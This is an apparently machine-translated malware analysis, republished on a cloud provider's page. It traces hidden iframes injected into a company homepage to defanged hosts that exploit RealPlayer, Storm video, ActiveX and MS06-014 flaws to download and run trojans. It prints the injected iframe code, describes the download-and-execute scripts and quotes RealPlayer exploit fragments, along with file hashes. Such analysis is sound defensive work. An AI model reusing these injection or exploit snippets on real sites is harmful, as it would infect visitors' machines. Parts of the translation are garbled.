A god wine company in Bama is infected with worm. win32.downloader/Trojan. win32.mnless.

Source: Internet
Author: User
Tags crc32 sha1

A god wine company in Bama is infected with worm. win32.downloader/Trojan. win32.mnless.

EndurerOriginal
1Version

Check the homepage code and find that the code is added multiple times:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>

<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 width = 1 Height = 1> </iframe>
<Ifame src = hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 width = 1 name = '000000' Height = 1> </iframe> <ifame src = hxxp: // A **. ll * sging **. COM/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>
---/

Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 contains code:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/haha.htm width = 5 Height = 5> </iframe>
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/gege.htm width = 5 Height = 5> </iframe>
---/

Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 and hxxp: // A ** A. ll * sging **. com/ww/new05.htm? Same as 075.

Hxxp: // A ** A. ll * sging **. com/AA/haha.htm is decrypted twice to obtain the original code. The function is to check the cookie variable OK and output the Code:
/---
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/11.js> </SCRIPT>
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/BB. js> </SCRIPT>
<Ifame width = '10' Height = '10' src = 'hxxp: // A **. ll * sging **. COM/AA/bf.html '> </iframe>
---/
Use the storm video vulnerability and baidubar. tool to download hxxp: // down. ll * sging **. com/BB/Bd. Cab

File Description: D:/test/Bd. Cab
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:45:22
Modification time: 23:45:30
Access time:
Size: 34045 bytes, 33.253 KB
MD5: 67e8a38e7570de02ec1e3b0fec7ac9d9
Sha1: 9ef39949c850cfe8c03f76fa0dfc7ec3bd286254
CRC32: 888380b0

File Description: D:/test/bd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 34837 bytes, 34.21 KB
MD5: 865188f4f8583f4c0728553b04375261
Sha1: bf3b97ae81f49caf96268ef4cff5b96c18eb88
CRC32: deed8b5c

Kaspersky reportsWorm. win32.downloader. Bi
RisingTrojan. win32.mnless. znc nspack

Hxxp: // A **. ll * sging **. COM/AA/11.js is decrypted once to obtain the original code. The function is to download hxxp: // down. ll * sging **. COM/BB/014.exe, Save As ntuser.com, and run.

File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:42:45
Modification time: 23:42:46
Access time:
Size: 34854 bytes, 34.38 KB
MD5: 19a5e9859be41540446fd3d7b6533d23
Sha1: 5b3a4028a4e85422acaa3f7f974ecbb5d35e936b
CRC32: 57901cec
Kaspersky reports worm. win32.downloader. BD
Rising Star: Backdoor. win32.agent. Yos nspack

Hxxp: // A ** A. ll * sging **. com/AA/BB. JS is the code used to exploit storm audio and video vulnerabilities.

Hxxp: // A ** A. ll * sging **. com/AA/PPP. js uses the PPStream vulnerability code.

Hxxp: // A ** A. ll * sging **. com/AA/bf.html is
Code for the stack overflow vulnerability of the lianzhong connectandenterroom ActiveX control.

Refer:
Lianzhong connectandenterroom ActiveX Control Stack Overflow Vulnerability
Http://www.nsfocus.net/vulndb/11122

Hxxp: // A ** A. ll * sging **. com/AA/gege.htm decrypted twice to obtain the original code. The code used for the RealPlayer vulnerability is interesting:
/---
Payload + = "yuange"; real. Import ("C: \ Program Files \ netmeeting \ testsnd.wav", payload, "",)}; realexploit ();)
---/

Hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 contains code
/---
<HTML>
<Ifame src = "88/881. htm" width = "20" Height = "0" frameborder = "0"> </iframe>
<Ifame src = "88/883. htm" width = "1" Height = "1" frameborder = "0"> </iframe>
</Html>
---/

Hxxp: // www. f ** oafa ** U. info/88/881 .htm utilizing MS06-014: msadco. download hxxp: // www. * 6 * 8y ** u *. CN/68down.exe, save as C:/Microsoft. PIF, by creating the file C:/Microsoft. vbs to start. The variable named qq784378237 in the code

File Description: D:/test/68down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 31876 bytes, 31.132 KB
MD5: 7f29c1dbaae355933130030aed699672
Sha1: 1a5ede06b6ccd19bb7fb9af3e9b0456e847bfdd0
CRC32: 2738d5ad

Kaspersky reports worm. win32.downloader. CG
The rising news is Trojan. win32.mnless. zyt.

Hxxp: // www. f ** oafa ** U. info/88/883 .htm is decrypted twice to obtain the original code, which is also used by the RealPlayer vulnerability. The last code is different from the above Code:
/---
Payload + = "chuizi ";
Real. Import ("C :\\ Program Files \ netmeeting \ testsnd.wav", payload, "", 0, 0 );
}
Realexploit ();)
---/

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.